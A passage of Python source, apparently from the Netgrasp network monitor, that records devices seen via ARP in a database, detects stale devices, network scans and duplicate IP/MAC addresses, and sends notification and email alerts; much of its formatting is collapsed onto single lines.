seen_ip, first_seen_ip, first_seen_host, seen_host, first_seen_device, seen_vendor, first_seen_vendor = (None, False, False, False, False, False, False, False, False, False) # Get ID for MAC, creating if necessary. 
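        # The lookups below walk the full chain for this sighting: mac (and its vendor),
        # then ip, then hostname, then the device row tying them together, and finally
        # an activity row; each step inserts a new record the first time it is seen.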
ng.db.cursor.execute("SELECT mid, vid FROM mac WHERE address = ?", (mac,)) seen = ng.db.cursor.fetchone() if seen: mid, vid = seen ng.debugger.debug("existing mac %s [%d, %d]", (mac, mid, vid)) seen_mac = True else: vendor = mac_lookup(mac) ng.db.cursor.execute("SELECT vendor.vid FROM vendor WHERE vendor.name = ?", (vendor,)) seen = ng.db.cursor.fetchone() if seen: vid = seen[0] ng.debugger.debug("existing vendor %s [%d]", (vendor, vid)) seen_vendor = True else: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new vendor"): ng.db.cursor.execute("INSERT INTO vendor (name, created) VALUES(?, ?)", (vendor, now)) ng.db.connection.commit() first_seen_vendor = True vid = ng.db.cursor.lastrowid ng.debugger.info("new vendor %s [%d]", (vendor, vid)) with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new mac"): ng.db.cursor.execute("INSERT INTO mac (vid, address, created, self) VALUES(?, ?, ?, ?)", (vid, mac, now, ip_is_mine(ip))) first_seen_mac = True ng.db.connection.commit() mid = ng.db.cursor.lastrowid ng.debugger.info("new mac %s [%d]", (mac, mid)) # Get ID for IP, creating if necessary. ng.db.cursor.execute("SELECT ip.iid FROM ip WHERE ip.mid = ? AND ip.address = ?", (mid, ip)) seen = ng.db.cursor.fetchone() if seen: iid = seen[0] ng.debugger.debug("existing ip %s [%d]", (ip, iid)) seen_ip = True else: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new ip"): ng.db.cursor.execute("INSERT INTO ip (mid, address, created) VALUES(?, ?, ?)", (mid, ip, now)) first_seen_ip = True ng.db.connection.commit() iid = ng.db.cursor.lastrowid ng.debugger.info("new ip %s [%d]", (ip, iid)) # Get ID for Hostname, creating if necessary. ng.db.cursor.execute("SELECT host.hid, host.name, host.custom_name FROM host WHERE host.iid = ?", (iid,)) seen = ng.db.cursor.fetchone() if seen: hid, host_name, custom_name = seen ng.debugger.debug("existing host %s (%s) [%d]", (host_name, custom_name, hid)) seen_host = True else: host_name = dns_lookup(ip) with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new host"): ng.db.cursor.execute("INSERT INTO host (iid, name, custom_name, created, updated) VALUES(?, ?, ?, ?, ?)", (iid, host_name, None, now, now)) ng.db.connection.commit() first_seen_host = True hid = ng.db.cursor.lastrowid ng.debugger.info("new hostname %s [%d]", (host_name, hid)) # Get ID for Device, creating if necessary. ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.iid = ?", (mid, iid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d]", (ip, mac, did)) else: # The IP may have changed for this Device. ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.hid = ?", (mid, hid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d] (new ip)", (ip, mac, did)) with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, update device (new ip)"): ng.db.cursor.execute("UPDATE device SET iid = ?, updated = ? 
WHERE did = ?", (iid, now, did)) log_event(mid, iid, did, rid, EVENT_SEEN_DEVICE, True) log_event(mid, iid, did, rid, EVENT_CHANGED_IP, True) ng.db.connection.commit() else: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, new device"): ng.db.cursor.execute("INSERT INTO device (mid, iid, hid, vid, created, updated) VALUES(?, ?, ?, ?, ?, ?)", (mid, iid, hid, vid, now, now)) ng.db.connection.commit() first_seen_device = True did = ng.db.cursor.lastrowid ng.debugger.info("new device %s (%s) [%d]", (ip, mac, did)) # Finally, log activity. ng.db.cursor.execute("SELECT activity.aid FROM activity WHERE activity.did = ? AND activity.active = 1", (did,)) seen = ng.db.cursor.fetchone() with exclusive_lock.ExclusiveFileLock(ng, 6, "device_seen, log activity"): if seen: aid = seen[0] ng.db.cursor.execute("UPDATE activity SET updated = ?, iid = ?, counter = counter + 1 WHERE aid = ?", (now, iid, aid)) log_event(mid, iid, did, rid, EVENT_SEEN_DEVICE, True) else: # @TODO interface, network ng.db.cursor.execute("INSERT INTO activity (did, iid, interface, network, created, updated, counter, active) VALUES(?, ?, ?, ?, ?, ?, ?, ?)", (did, iid, None, None, now, now, 1, 1)) if not first_seen_device: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_DEVICE_RECENTLY, True) # We delayed logging these events until we know the device id (did). if seen_mac: log_event(mid, iid, did, rid, EVENT_SEEN_MAC, True) if first_seen_mac: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_MAC, True) if seen_ip: log_event(mid, iid, did, rid, EVENT_SEEN_IP, True) if first_seen_ip: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_IP, True) if seen_host: log_event(mid, iid, did, rid, EVENT_SEEN_HOST, True) if first_seen_host: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_HOST, True) if seen_vendor: log_event(mid, iid, did, rid, EVENT_SEEN_VENDOR, True) if first_seen_vendor: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_VENDOR, True) if first_seen_device: log_event(mid, iid, did, rid, EVENT_FIRST_SEEN_DEVICE, True) ng.db.connection.commit() return mid, iid, did except Exception: ng.debugger.dump_exception("device_seen() caught exception") def device_request(ip, mac): ng = netgrasp_instance try: from utils import exclusive_lock import datetime ng.debugger.debug("entering device_request(%s, %s)", (ip, mac)) now = datetime.datetime.now() mid, iid, did = get_ids(ip, mac) # Log request. ng.db.cursor.execute("SELECT request.rid, request.active FROM request WHERE request.ip = ? 
ORDER BY updated DESC LIMIT 1", (ip,)) seen = ng.db.cursor.fetchone() if seen: rid, active = seen if active: with exclusive_lock.ExclusiveFileLock(ng, 6, "device_request, update device request"): ng.db.cursor.execute("UPDATE request SET updated = ?, ip = ?, counter = counter + 1 WHERE rid = ?", (now, ip, rid)) log_event(mid, iid, did, rid, EVENT_REQUEST_IP, True) ng.db.connection.commit() return rid with exclusive_lock.ExclusiveFileLock(ng, 6, "device_request, new device request"): # @TODO interface, network ng.db.cursor.execute("INSERT INTO request (did, ip, interface, network, created, updated, counter, active) VALUES(?, ?, ?, ?, ?, ?, ?, ?)", (did, ip, None, None, now, now, 1, 1)) rid = ng.db.cursor.lastrowid if seen: log_event(mid, iid, did, rid, EVENT_FIRST_REQUEST_RECENTLY_IP, True) else: log_event(mid, iid, did, rid, EVENT_FIRST_REQUEST_IP, True) ng.db.connection.commit() return rid except Exception: ng.debugger.dump_exception("device_request() caught exception") def get_mac(ip): ng = netgrasp_instance try: ng.debugger.debug("entering get_mac(%s)", (ip,)) ng.db.cursor.execute("SELECT mac.address FROM mac LEFT JOIN ip ON ip.mid = mac.mid WHERE ip.address = ?", (ip,)) mac = ng.db.cursor.fetchone() if mac: return mac[0] else: return None except Exception: ng.debugger.dump_exception("get_mac() caught exception") def get_ids(ip, mac): ng = netgrasp_instance try: ng.debugger.debug("entering get_ids(%s, %s)", (ip, mac)) # Check if we know this MAC. if mac != BROADCAST: ng.db.cursor.execute("SELECT mid FROM mac WHERE address = ?", (mac,)) seen = ng.db.cursor.fetchone() if seen: mid = seen[0] else: mid = None else: # Look the MAC up in our arp cache. ng.db.cursor.execute("SELECT mid FROM ip WHERE address = ? ORDER BY created DESC LIMIT 1", (ip,)) seen = ng.db.cursor.fetchone() if seen: mid = seen[0] else: mid = None # Check if we know this IP. if mid: ng.db.cursor.execute("SELECT ip.iid FROM ip WHERE ip.mid = ? AND ip.address = ?", (mid, ip)) seen = ng.db.cursor.fetchone() if seen: iid = seen[0] else: iid = None else: iid = None # Check if we know this Host. if iid: ng.db.cursor.execute("SELECT host.hid, host.name, host.custom_name FROM host WHERE host.iid = ?", (iid,)) seen = ng.db.cursor.fetchone() if seen: hid, host_name, custom_name = seen else: hid = None else: hid = None # Check if we know this Device. if mid and iid: ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.iid = ?", (mid, iid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d]", (ip, mac, did)) else: did = None else: did = None if not did and mid and hid: ng.db.cursor.execute("SELECT device.did FROM device WHERE device.mid = ? AND device.hid = ?", (mid, hid)) seen = ng.db.cursor.fetchone() if seen: did = seen[0] ng.debugger.debug("existing device %s (%s) [%d] (new ip)", (ip, mac, did)) else: did = None ng.debugger.debug("mid(%s) iid(%s) did(%s)", (mid, iid, did)) return mid, iid, did except Exception: ng.debugger.dump_exception("get_ids() caught exception") def get_details(did): ng = netgrasp_instance try: ng.debugger.debug("entering get_details(%s)", (did,)) ng.db.cursor.execute("SELECT activity.active, activity.counter, ip.address, mac.address, host.name, host.custom_name, vendor.name FROM activity LEFT JOIN device ON activity.did = device.did LEFT JOIN host ON device.hid = host.hid LEFT JOIN ip ON device.iid = ip.iid LEFT JOIN mac ON device.mid = mac.mid LEFT JOIN vendor ON device.vid = vendor.vid WHERE device.did = ? 
ORDER BY activity.updated DESC LIMIT 1", (did,)) info = ng.db.cursor.fetchone() if info: active, counter, ip, mac, host_name, custom_name, vendor = info return active, counter, ip, mac, host_name, custom_name, vendor else: ng.debugger.warning("unknown device %d", (did,)) return False except Exception: ng.debugger.dump_exception("get_details() caught exception") def first_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering first_seen(did)", (did,)) ng.db.cursor.execute("SELECT created FROM activity WHERE did = ? AND created NOT NULL ORDER BY created ASC LIMIT 1", (did,)) active = ng.db.cursor.fetchone() if active: active = active[0] if active: return active else: return False except Exception: ng.debugger.dump_exception("first_seen() caught exception") def first_seen_recently(did): ng = netgrasp_instance try: ng.debugger.debug("entering last_seen_recently(%s)", (did,)) ng.db.cursor.execute('SELECT created FROM activity WHERE did = ? AND created NOT NULL ORDER BY created DESC LIMIT 1', (did,)) recent = ng.db.cursor.fetchone() if recent: recent = recent[0] if recent: return recent else: return False except Exception: ng.debugger.dump_exception("first_seen_recently() caught exception") def last_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering last_seen(%s)", (did,)) ng.db.cursor.execute('SELECT updated FROM activity WHERE did=? AND updated NOT NULL ORDER BY updated DESC LIMIT 1', (did,)) active = ng.db.cursor.fetchone() if active: return active[0] else: return False except Exception: ng.debugger.dump_exception("last_seen() caught exception") def previously_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering previously_seen(%s)", (did,)) ng.db.cursor.execute('SELECT updated FROM activity WHERE did=? AND updated NOT NULL AND active != 1 ORDER BY updated DESC LIMIT 1', (did,)) previous = ng.db.cursor.fetchone() if previous: return previous[0] else: return False except Exception: ng.debugger.dump_exception("previously_seen() caught exception") def first_requested(did): ng = netgrasp_instance try: ng.debugger.debug("entering first_requested(%s)", (did,)) ng.db.cursor.execute('SELECT created FROM request WHERE did=? AND created NOT NULL ORDER BY created ASC LIMIT 1', (did,)) active = ng.db.cursor.fetchone() if active: return active[0] else: return False except Exception: ng.debugger.dump_exception("first_requested() caught exception") def last_requested(did): ng = netgrasp_instance try: ng.debugger.debug("entering last_requested(%s)", (did,)) ng.db.cursor.execute('SELECT updated FROM request WHERE did=? AND updated NOT NULL ORDER BY updated DESC LIMIT 1', (did,)) last = ng.db.cursor.fetchone() if last: return last[0] else: return False except Exception: ng.debugger.dump_exception("last_requested() caught exception") def time_seen(did): ng = netgrasp_instance try: ng.debugger.debug("entering time_seen(%s)", (did,)) ng.db.cursor.execute('SELECT created, updated FROM activity WHERE did=? ORDER BY updated DESC LIMIT 1', (did,)) active = ng.db.cursor.fetchone() if active: created, updated = active ng.debugger.debug("did(%d) created(%s) updated(%s)", (did, created, updated)) return updated - created else: return False except Exception: ng.debugger.dump_exception("time_seen() caught exception") def previous_ip(did): ng = netgrasp_instance try: ng.debugger.debug("entering previous_ip(%s)", (did,)) prev_ip = None ng.db.cursor.execute("SELECT DISTINCT iid FROM activity WHERE did = ? 
ORDER BY updated DESC LIMIT 2", (did,)) ips = ng.db.cursor.fetchall() if ips and len(ips) == 2: ng.db.cursor.execute("SELECT address FROM ip WHERE iid = ?", (ips[1])) prev_ip = ng.db.cursor.fetchone() if prev_ip: return prev_ip[0] else: return None except Exception: ng.debugger.dump_exception("previous_ip() caught exception") def active_devices_with_ip(ip): ng = netgrasp_instance try: ng.debugger.debug("entering active_devices_with_ip(%s)", (ip,)) devices = None ng.db.cursor.execute("SELECT iid FROM ip WHERE address = ?", (ip,)) ids = ng.db.cursor.fetchall() if ids: iids = [] for iid in ids: iids.append(iid[0]) ng.db.cursor.execute("SELECT DISTINCT activity.did, ip.address, mac.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid LEFT JOIN mac ON ip.mid = mac.mid WHERE active = 1 AND activity.iid IN ("+ ",".join("?"*len(iids)) + ")", iids) devices = ng.db.cursor.fetchall() if devices: dids = [] for device in devices: _did, _ip, _mac = device dids.append((_did, _ip, _mac)) return dids else: return None except Exception: ng.debugger.dump_exception("active_devices_with_ip() caught exception") def active_devices_with_mac(mac): ng = netgrasp_instance try: ng.debugger.debug("entering active_devices_with_mac(%s)", (mac,)) devices = None ng.db.cursor.execute("SELECT ip.iid FROM mac LEFT JOIN ip ON mac.mid = ip.mid WHERE mac.address = ?", (mac,)) ids = ng.db.cursor.fetchall() if ids: iids = [] for iid in ids: iids.append(iid[0]) ng.db.cursor.execute("SELECT DISTINCT activity.did, ip.address, mac.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid LEFT JOIN mac ON ip.mid = mac.mid WHERE active = 1 AND activity.iid IN ("+ ",".join("?"*len(iids)) + ")", iids) devices = ng.db.cursor.fetchall() if devices: dids = [] for device in devices: _did, _ip, _mac = device dids.append((_did, _ip, _mac)) return dids else: return None except Exception: ng.debugger.dump_exception("active_devices_with_mac() caught exception") def devices_requesting_ip(ip, timeout): ng = netgrasp_instance try: ng.debugger.debug("entering devices_requesting_ip(%s, %s)", (ip, timeout)) stale = datetime.datetime.now() - datetime.timedelta(seconds=timeout) dids = [] ng.db.cursor.execute("SELECT dst_ip FROM arp WHERE src_ip = ? AND rid IS NOT NULL AND timestamp < ? GROUP BY src_ip ORDER BY timestamp DESC", (ip, stale)) ips = ng.db.cursor.fetchall() if ips: for dst_ip in ips: dst_mac = get_mac(dst_ip[0]) _mid, _iid, _did = get_ids(dst_ip[0], dst_mac) dids.append((_did, dst_ip, dst_mac)) ng.debugger.debug("did, dst_ip, dst_mac(%s)", (dids,)) return dids except Exception: ng.debugger.dump_exception("devices_requesting_ip() caught exception") # Mark IP/MAC pairs as no longer active if we've not seen ARP activity for >active_timeout seconds def detect_stale_ips(): ng = netgrasp_instance try: ng.debugger.debug("entering detect_stale_ips()") stale = datetime.datetime.now() - datetime.timedelta(seconds=ng.listen["active_timeout"]) # Mark no-longer active devices stale. ng.db.cursor.execute("SELECT aid, did, iid FROM activity WHERE active = 1 AND updated < ?", (stale,)) rows = ng.db.cursor.fetchall() if rows: with exclusive_lock.ExclusiveFileLock(ng, 5, "detect_stale_ips, activity"): for row in rows: aid, did, iid = row ng.db.cursor.execute("SELECT ip.address, mac.mid, mac.address FROM ip LEFT JOIN mac ON ip.mid = mac.mid WHERE iid = ? 
LIMIT 1", (iid,)) address = ng.db.cursor.fetchone() if address: ip, mid, mac = address log_event(mid, iid, did, None, EVENT_STALE, True) ng.debugger.info("%s [%s] is no longer active", (ip, mac)) else: ng.debugger.error("aid(%d) did(%d) is no longer active, no ip/mac found)", (aid, did)) ng.db.cursor.execute("UPDATE activity SET active = 0 WHERE aid = ?", (aid,)) ng.db.connection.commit() # Mark no-longer active requests stale. ng.db.cursor.execute("SELECT rid, did, ip FROM request WHERE active = 1 AND updated < ?", (stale,)) rows = ng.db.cursor.fetchall() if rows: with exclusive_lock.ExclusiveFileLock(ng, 5, "detect_stale_ips, request"): for row in rows: rid, did, ip = row mid, iid = (None, None) log_event(mid, iid, did, rid, EVENT_REQUEST_STALE, True) ng.debugger.info("%s (%d) is no longer active)", (ip, did)) ng.db.cursor.execute("UPDATE request SET active = 0 WHERE rid = ?", (rid,)) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("detect_stale_ips() caught exception") def detect_netscans(): ng = netgrasp_instance try: ng.debugger.debug("entering detect_netscans()") now = datetime.datetime.now() stale = datetime.datetime.now() - datetime.timedelta(seconds=ng.listen["active_timeout"]) - datetime.timedelta(minutes=10) ng.db.cursor.execute("SELECT COUNT(DISTINCT arp.dst_ip) AS count, arp.src_ip, arp.src_mac FROM arp LEFT JOIN request ON arp.rid = request.rid WHERE request.active = 1 GROUP BY arp.src_ip HAVING count > 50") scans = ng.db.cursor.fetchall() if scans: ng.debugger.debug("scans in progress (count, src ip, src mac): %s", (scans,)) for scan in scans: count, src_ip, src_mac = scan mid, iid, did = get_ids(src_ip, src_mac) ng.db.cursor.execute("SELECT eid FROM event WHERE did = ? AND type = ? AND timestamp > ?", (did, EVENT_SCAN, stale)) already_detected = ng.db.cursor.fetchone() if not already_detected: # logging rid doesn't make sense, as there's 1 rid per IP requested. log_event(mid, iid, did, None, EVENT_SCAN) ng.debugger.info("network scan by %s [%s]", (src_ip, src_mac)) except Exception: ng.debugger.dump_exception("detect_netscans() caught exception") def detect_anomalies(): ng = netgrasp_instance try: ng.debugger.debug("entering detect_anomalies()") stale = datetime.datetime.now() - datetime.timedelta(seconds=ng.listen["active_timeout"]) # Multiple MACs with the same IP. ng.db.cursor.execute("SELECT COUNT(activity.iid) AS count, ip.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE activity.active = 1 GROUP BY activity.iid HAVING count > 1 ORDER BY ip.iid ASC") duplicates = ng.db.cursor.fetchall() ng.debugger.debug("duplicate ips: %s", (duplicates,)) if duplicates: for duplicate in duplicates: count, ip = duplicate ng.db.cursor.execute("SELECT ip.mid, ip.iid, activity.did FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE ip.address = ? AND active = 1", (ip,)) dupes = ng.db.cursor.fetchall() ng.debugger.debug("dupes: %s", (dupes,)) for dupe in dupes: mid, iid, did = dupe ng.db.cursor.execute("SELECT eid FROM event WHERE mid = ? AND type = ? AND timestamp > ?", (mid, EVENT_DUPLICATE_IP, stale)) already_detected = ng.db.cursor.fetchone() if already_detected: break log_event(mid, iid, did, None, EVENT_DUPLICATE_IP) ng.debugger.info("multiple MACs with same IP: mid=%d, iid=%d", (mid, iid)) # Multiple IPs with the same MAC. 
ng.db.cursor.execute("SELECT COUNT(ip.mid) AS count, ip.mid FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE activity.active = 1 GROUP BY ip.mid HAVING count > 1 ORDER BY ip.mid ASC") duplicates = ng.db.cursor.fetchall() ng.debugger.debug("duplicate macs: %s", (duplicates,)) if duplicates: for duplicate in duplicates: count, mid = duplicate ng.db.cursor.execute("SELECT ip.mid, ip.iid, activity.did FROM activity LEFT JOIN ip ON activity.iid = ip.iid WHERE ip.mid = ? AND active = 1", (mid,)) dupes = ng.db.cursor.fetchall() ng.debugger.debug("dupes: %s", (dupes,)) for dupe in dupes: mid, iid, did = dupe ng.db.cursor.execute("SELECT eid FROM event WHERE iid = ? AND type = ? AND timestamp > ?", (iid, EVENT_DUPLICATE_MAC, stale)) already_detected = ng.db.cursor.fetchone() ng.debugger.debug("already_detected: %s", (already_detected,)) if already_detected: break log_event(mid, iid, did, None, EVENT_DUPLICATE_MAC) ng.debugger.info("multiple IPs with same MAC: mid=%d, iid=%d", (mid, iid)) except Exception: ng.debugger.dump_exception("detect_anomalies() caught exception") def send_notifications(): ng = netgrasp_instance try: ng.debugger.debug("entering send_notifications()") if not ng.notification["enabled"]: ng.debugger.debug("notifications disabled") return False if not ng.notification["alerts"]: ng.debugger.debug("no notification alerts configured") return False import ntfy timer = simple_timer.Timer() # only send notifications for configured events ng.db.cursor.execute("SELECT eid, mid, iid, did, timestamp, type, processed FROM event WHERE NOT (processed & 8) AND type IN ("+ ",".join("?"*len(ng.notification["alerts"])) + ")", ng.notification["alerts"]) rows = ng.db.cursor.fetchall() if rows: max_eid = 0 for row in rows: eid, mid, iid, did, timestamp, event, processed = row if eid > max_eid: max_eid = eid if event in ng.notification["alerts"]: details = get_details(did) if not details: ng.debugger.warning("invalid device %d, unable to generate notification") continue active, counter, ip, mac, host_name, custom_name, vendor = details ng.debugger.info("event %s [%d] in %s, generating notification alert", (event, eid, ng.notification["alerts"])) frstseen = first_seen(did) lastseen = first_seen_recently(did) prevseen = previously_seen(did) title = """Netgrasp alert: %s""" % event body = """%s with IP %s [%s], seen %s, previously seen %s, first seen %s""" % \ (pretty.name_did(did), ip, mac, pretty.time_ago(lastseen), pretty.time_ago(prevseen), pretty.time_ago(frstseen)) ntfy.notify(body, title) else: ng.debugger.debug("event %s [%d] NOT in %s", (event, eid, ng.notification["alerts"])) if timer.elapsed() > MAXSECONDS: ng.debugger.debug("processing notifications >%d seconds, aborting", (MAXSECONDS,)) with exclusive_lock.ExclusiveFileLock(ng, 5, "send_notifications, aborting"): ng.db.cursor.execute("UPDATE event SET processed=processed + ? WHERE eid <= ? AND NOT (processed & ?)", (PROCESSED_NOTIFICATION, max_eid, PROCESSED_NOTIFICATION)) ng.db.connection.commit() return with exclusive_lock.ExclusiveFileLock(ng, 5, "send_notifications"): ng.db.cursor.execute("UPDATE event SET processed=processed + ? WHERE eid <= ? 
AND NOT (processed & ?)", (PROCESSED_NOTIFICATION, max_eid, PROCESSED_NOTIFICATION))
            ng.db.connection.commit()

    except Exception:
        ng.debugger.dump_exception("send_notifications() caught exception")

TALKED_TO_LIMIT = 50

def send_email_alerts():
    ng = netgrasp_instance

    try:
        ng.debugger.debug("entering send_email_alerts()")
        if not ng.email["enabled"]:
            ng.debugger.debug("email disabled")
            return False

        if not ng.email["alerts"]:
            ng.debugger.debug("no email alerts configured")
            return False

        day = datetime.datetime.now() - datetime.timedelta(days=1)

        ng.db.cursor.execute("SELECT eid, mid, iid, did, timestamp, type, processed FROM event WHERE NOT (processed & 1) AND type IN ("+ ",".join("?"*len(ng.email["alerts"])) + ")", ng.email["alerts"])
        rows = ng.db.cursor.fetchall()
        if rows:
            max_eid = 0
            processed_events = 0
            duplicate_macs = []
            duplicate_ips = []
            for row in rows:
                eid, mid, iid, did, timestamp, event, processed = row
                ng.debugger.debug("processing event %d for iid[%d] mid[%d] at %s", (eid, iid, mid, timestamp))
                if eid > max_eid:
                    max_eid = eid
                processed_events += 1
                # only send emails for configured events
                if event in ng.email["alerts"]:
                    details = get_details(did)
                    if not details:
                        ng.debugger.warning("invalid device %d, unable to generate alert", (did,))
                        continue
                    active, counter, ip, mac, host_name, custom_name, vendor = details

                    if event == EVENT_DUPLICATE_MAC:
                        if mac in duplicate_macs:
                            ng.debugger.debug("event %s [%d], notification email already sent", (event, eid))
                            continue
                        else:
                            ng.debugger.debug("event %s [%d], first time seeing %s", (event, eid, mac))
                            duplicate_macs.append(mac)
                    elif event == EVENT_DUPLICATE_IP:
                        if ip in duplicate_ips:
                            ng.debugger.debug("event %s [%d], notification email already sent", (event, eid))
                            continue
                        else:
                            ng.debugger.debug("event %s [%d], first time seeing %s", (event, eid, ip))
                            duplicate_ips.append(ip)

                    ng.debugger.info("event %s [%d] in %s, generating notification email", (event, eid, ng.email["alerts"]))
                    frstseen = first_seen(did)
                    frstrequ = first_requested(did)
                    lastseen = last_seen(did)
                    timeseen = time_seen(did)
                    prevseen = previously_seen(did)
                    lastrequ = last_requested(did)

                    ng.db.cursor.execute("SELECT dst_ip, dst_mac FROM arp WHERE src_ip = ? AND timestamp >= ? GROUP BY dst_ip LIMIT ?", (ip, day, TALKED_TO_LIMIT))
                    peers = ng.db.cursor.fetchall()
                    talked_to_list = []
                    talked_to_count = 0
                    if peers:
                        talked_to_count = len(peers)
                        for peer in peers:
                            dst_ip, dst_mac = peer
                            dst_mid, dst_iid, dst_did = get_ids(dst_ip, dst_mac)
                            ng.debugger.debug("ip, mac, mid, iid, did: %s, %s, %s, %s, %s", (dst_ip, dst_mac, dst_mid, dst_iid, dst_did))
                            talked_to_list.append("""%s (%s)""" % (pretty.name_did(dst_did, dst_ip), dst_ip))
                    if talked_to_count == TALKED_TO_LIMIT:
                        ng.db.cursor.execute("SELECT COUNT(DISTINCT dst_ip) AS count FROM arp WHERE src_ip = ?
AND timestamp >= ?", (ip, day)) proper_count = ng.db.cursor.fetchone() if proper_count: talked_to_count = proper_count[0] devices = active_devices_with_ip(ip) devices_with_ip = [] if devices: for device in devices: list_did, list_ip, list_mac = device devices_with_ip.append("""%s [%s]""" % (pretty.name_did(list_did), list_mac)) devices = active_devices_with_mac(mac) devices_with_mac = [] if devices: for device in devices: list_did, list_ip, list_mac = device devices_with_mac.append("""%s (%s)""" % (pretty.name_did(list_did), list_ip)) devices = devices_requesting_ip(ip, ng.listen["active_timeout"]) devices_requesting = [] if devices: for device in devices: list_did, list_ip, list_mac = device devices_requesting.append("""%s (%s)""" % (pretty.name_did(list_did), list_ip)) email.MailSend(event, 'alert', dict( name=pretty.name_did(did), ip=ip, mac=mac, event_id=eid, vendor=vendor, hostname=host_name, custom_name=custom_name, first_seen=pretty.time_ago(frstseen), last_seen=pretty.time_ago(lastseen), recently_seen_count=counter, time_seen=pretty.time_elapsed(timeseen), previously_seen=pretty.time_ago(prevseen), first_requested=pretty.time_ago(frstrequ), last_requested=pretty.time_ago(lastrequ), previous_ip=previous_ip(did), devices_with_ip=devices_with_ip, devices_with_mac=devices_with_mac, devices_requesting=devices_requesting, active_boolean=active, talked_to_count=talked_to_count, talked_to_list=talked_to_list, event=event )) else: ng.debugger.debug("event %s [%d] NOT in %s", (event, eid, ng.email["alerts"])) with exclusive_lock.ExclusiveFileLock(ng, 5, "send_email_alerts"): ng.db.cursor.execute("UPDATE event SET processed=processed + ? WHERE eid <= ? AND NOT (processed & ?)", (PROCESSED_ALERT, max_eid, PROCESSED_ALERT)) ng.db.connection.commit() ng.debugger.debug("send_email_alerts: processed %d events", (processed_events,)) except Exception: ng.debugger.dump_exception("send_email_alerts() caught exception") # Identify vendor associated with MAC. def mac_lookup(mac): ng = netgrasp_instance try: ng.debugger.debug("entering mac_lookup(%s)", (mac,)) import re import httplib if not re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", mac.lower()): fixed_mac = [] pieces = mac.split(":") if not pieces: pieces = mac.split("-") for piece in pieces: if len(piece) == 1: piece = "0"+piece fixed_mac.append(piece) fixed_mac = ":".join(fixed_mac) mac = fixed_mac ng.debugger.debug("Looking up vendor for %s", (mac,)) http = httplib.HTTPConnection("api.macvendors.com", 80) url = """/%s""" % mac http.request("GET", url) response = http.getresponse() if response.status == 200 and response.reason == "OK": vendor = response.read() ng.debugger.debug("identified %s as %s", (mac, vendor)) else: vendor = None ng.debugger.info("failed to identify %s", (mac,)) return vendor except Exception: ng.debugger.dump_exception("mac_lookup() caught exception") def refresh_dns_cache(): ng = netgrasp_instance # @TODO consider retrieving actual TTL from DNS -- for now refresh active devices regularly try: ng.debugger.debug("entering refresh_dns_cache") ttl = datetime.datetime.now() - datetime.timedelta(minutes=15) ng.db.cursor.execute("SELECT host.hid, host.name, activity.did, mac.address, ip.address FROM activity LEFT JOIN ip ON activity.iid = ip.iid LEFT JOIN host ON activity.iid = host.iid LEFT JOIN mac ON ip.mid = mac.mid WHERE activity.active = 1 AND host.updated < ? 
LIMIT 10", (ttl,)) rows = ng.db.cursor.fetchall() for row in rows: hid, old_name, did, mac, ip = row name = dns_lookup(ip) now = datetime.datetime.now() with exclusive_lock.ExclusiveFileLock(ng, 5, "refresh_dns_cache"): ng.debugger.debug("Refreshing hostname from '%s' to '%s' for %s", (old_name, name, ip)) ng.db.cursor.execute("UPDATE host SET name = ?, updated = ? WHERE hid = ?", (name, now, hid)) ng.db.connection.commit() except Exception: ng.debugger.dump_exception("refresh_dns_cache() caught exception") def dns_lookup(ip): ng = netgrasp_instance try: import socket ng.debugger.debug("entering dns_lookup(%s)", (ip,)) try: host_name, aliaslist, ipaddrlist = socket.gethostbyaddr(ip) ng.debugger.debug("host_name(%s), aliaslist(%s), ipaddrlist(%s)", (host_name, aliaslist, ipaddrlist)) return host_name except Exception as e: host_name = "unknown" ng.debugger.debug("dns_lookup() socket.gethostbyaddr(%s) failed, host_name = %s: %s", (ip, host_name, e)) return host_name except Exception: ng.debugger.dump_exception("dns_lookup() caught exception") # Generates daily and weekly email digests. def send_email_digests(): ng = netgrasp_instance try: ng.debugger.debug("entering send_email_digests()") if not ng.email["enabled"]: ng.debugger.debug("email disabled") return False if not ng.email["digests"]: ng.debugger.debug("no digests configured") return False timer = simple_timer.Timer() now = datetime.datetime.now() # @TODO make sure we validate available digests for digest in ng.email["digests"]: if timer.elapsed() > MAXSECONDS: ng.debugger.debug("processing digests >%d seconds, aborting digest", (MAXSECONDS,)) return if digest == "daily": timestamp_string = "daily_digest_timestamp" future_digest_timestamp = now + datetime.timedelta(days=1) time_period = now - datetime.timedelta(days=1) time_period_description = "24 hours" previous_time_period = now - datetime.timedelta(days=2) elif digest == "weekly": timestamp_string = "weekly_digest_timestamp" future_digest_timestamp = now + datetime.timedelta(weeks=1) time_period = now - datetime.timedelta(weeks=1) time_period_description = "7 days" previous_time_period = now - datetime.timedelta(weeks=2) next_digest_timestamp = ng.db.get_state(timestamp_string, "", True) if not next_digest_timestamp: # first time here, schedule a digest for appropriate time in future ng.db.set_state(timestamp_string, future_digest_timestamp) next_digest_timestamp = future_digest_timestamp if now < next_digest_timestamp: 